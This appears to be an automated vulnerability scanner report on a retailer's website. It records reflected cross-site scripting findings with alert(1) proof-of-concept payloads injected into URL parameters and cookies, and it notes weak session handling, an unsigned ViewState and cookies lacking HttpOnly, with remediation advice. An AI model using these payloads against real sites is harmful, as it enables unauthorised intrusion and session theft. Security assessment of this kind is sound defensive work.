Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.adorama.com/Catalog.tpl [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.adorama.com
Path:
/Catalog.tpl
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12d67"><script>alert(1)</script>2de6d889351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Catalog.tpl?op=itemlist&cat1=Video&cat2=Consumer%20Video&cat3=Camcorders&feature2=HD&12d67"><script>alert(1)</script>2de6d889351=1 HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the sku request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94306"-alert(1)-"96376c115d3 was submitted in the sku parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Catalog.tpl?op=ReviewWrapper&sku=ICA1DM494306"-alert(1)-"96376c115d3 HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<hea ...[SNIP]... <script type="text/javascript"> var pr_page_id = "ICA1DM494306"-alert(1)-"96376c115d3" var pr_merchant_id = 9721; var pr_source = "web"; </script> ...[SNIP]...
The value of the sku request parameter is copied into the HTML document as text between TITLE tags. The payload a31f0</title><script>alert(1)</script>2662c2c3d03 was submitted in the sku parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /catlite.tpl?op=large_imagemulti&sku=ICA1DM4a31f0</title><script>alert(1)</script>2662c2c3d03 HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
Response
HTTP/1.1 200 OK Expires: Sun, 26 Dec 2010 04:33:28 GMT Mime-Version: 1.0 Content-Type: text/html Date: Sun, 26 Dec 2010 04:33:28 GMT Content-Length: 2544 Connection: close
<HTML>
<html> <head> <title>Large Image Adorama Sku#ICA1DM4a31f0</title><script>alert(1)</script>2662c2c3d03</title> <meta http-equiv="Content-Type" c ...[SNIP]...
The value of the refby cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f372"-alert(1)-"25e0d815ee7 was submitted in the refby cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alc/ HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=1f372"-alert(1)-"25e0d815ee7; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
The value of the sid3 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb519"-alert(1)-"727bfc212e3 was submitted in the sid3 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alc/ HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189kybb519"-alert(1)-"727bfc212e3; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
The value of the sid3 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88960"><script>alert(1)</script>cb2374af735 was submitted in the sid3 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /catalog.tpl?op=process&func=buy&sku=ICA1DM4KA&sc_url=ICA1DM4.html HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky88960"><script>alert(1)</script>cb2374af735; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml ...[SNIP]... <font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
3. ASP.NET ViewState without MAC enabledpreviousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.adorama.com
Path:
/alc/
Issue description
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
Request
GET /alc/ HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ICA1DM4.html?refby=become HTTP/1.1 Host: www.adorama.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alc/ HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /catalog.tpl HTTP/1.1 Host: www.adorama.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
